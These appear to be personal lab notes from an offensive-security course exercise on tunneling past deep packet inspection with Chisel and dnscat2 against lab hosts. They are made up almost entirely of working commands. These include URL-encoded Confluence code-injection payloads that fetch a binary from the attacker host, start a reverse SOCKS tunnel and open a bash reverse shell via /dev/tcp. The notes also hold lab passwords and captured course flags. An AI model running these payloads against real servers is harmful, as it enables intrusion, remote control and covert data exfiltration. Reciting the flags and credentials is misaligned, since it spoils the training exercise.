Tunneling through deep packet inspection

HTTP tunneling with Chisel

attacker 192.168.49.51
confluence01 192.168.51.63
pgdatabase01 10.4.51.215

wget https://github.com/jpillora/chisel/releases/download/v1.8.1/chisel_1.8.1_linux_amd64.gz
gunzip chisel_1.8.1_linux_amd64.gz
mv ./chisel_1.8.1_linux_amd64 ./chisel
sudo cp ./chisel /var/www/html
chmod +x chisel
sudo cp chisel /usr/local/bin/
chisel --version
1.8.1

sudo systemctl start apache2

curl http://192.168.51.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27wget%20192.168.49.51/chisel%20-O%20/tmp/chisel%20%26%26%20chmod%20%2Bx%20/tmp/chisel%27%29.start%28%29%22%29%7D/

tail -f /var/log/apache2/access.log

chisel server --port 8080 --reverse
ss -ntplu

sudo tcpdump -nvvvXi eth0 tcp port 8080

curl http://192.168.51.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27/tmp/chisel%20client%20192.168.49.51:8080%20R:socks%27%29.start%28%29%22%29%7D/

sudo apt install ncat
ssh -o ProxyCommand='ncat --proxy-type socks5 --proxy 127.0.0.1:1080 %h %p' database_admin@10.4.51.215
database_admin:sqlpass123

/tmp/chisel_flag
OS{cefcc2a27c15a9ea6a61554271b889c1}

-------
DNS tunneling fundamentals

attacker 192.168.49.51
confluence01 192.168.51.63
multiserver03 192.168.51.64
pgdatabase01 10.4.51.215
felineauthority 192.168.51.7

FELINEAUTHORITY kali:7he_C4t_c0ntro11er
pgdatabase01 database_admin:sqlpass123

nc -nvlp 4444

curl http://192.168.51.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/192.168.49.51/4444%200%3E%261%27%29.start%28%29%22%29%7D/

nslookup -type=txt give-me.cat-facts.internal
OS{06b61e3f6e231aa9b055da2c683927f1}

-----------
DNS tunneling with dnscat2

attacker 192.168.49.51
confluence01 192.168.51.63
multiserver03 192.168.51.64
pgdatabase01 10.4.51.215
hrshares 172.16.51.217
felineauthority 192.168.51.7

FELINEAUTHORITY kali:7he_C4t_c0ntro11er
pgdatabase01 database_admin:sqlpass123

Follow the steps in this section to set up the dnscat2 server on FELINEAUTHORITY, and execute the dnscat2 client on PGDATABASE01. Download the dnscat_exercise_client from the Resources section ro your Kali machine. If you're running the aarch64 build of Kali, download the dnscat_exercise_client_aarch64 binary instead. Set up a port forward with dnscat2 which allows you to run the binary against the server running on port 4646 on HRSHARES.

ssh kali@192.168.51.7
dnscat2-server feline.corp

nc -nvlp 4444

curl http://192.168.51.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/192.168.49.51/4444%200%3E%261%27%29.start%28%29%22%29%7D/

python3 -c 'import pty; pty.spawn("/bin/sh")'
ssh database_admin@10.4.51.215
database_admin:sqlpass123

cd dnscat/
./dnscat feline.corp

windows
window -i 1

listen 127.0.0.1:4455 172.16.51.217:445

smbclient -p 4455 -L //127.0.0.1 -U hr_admin --password=Welcome1234

ssh kali@192.168.51.7
dnscat2-server --dns 'port=4646'

kali:
sudo apt update
sudo apt install dnscat2
find / -name 'dnscat2' 2>/dev/null
/user/share/dnscat2
ruby ./dnscat2.rb -l 4646 -r 192.168.51.7:4646

kali:
download raw: https://github.com/leefrk/hacking/blob/main/dnscat_exercise_client
chmod +x dnscat_exercise_client
sudo ./dnscat_exercise_client -i 127.0.0.1 -p 4646
Error:
thread 'main' panicked at 'Failed to connect to 127.0.0.1:4646: Connection refused (os error 111)', src/client.rs:79:13
note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace









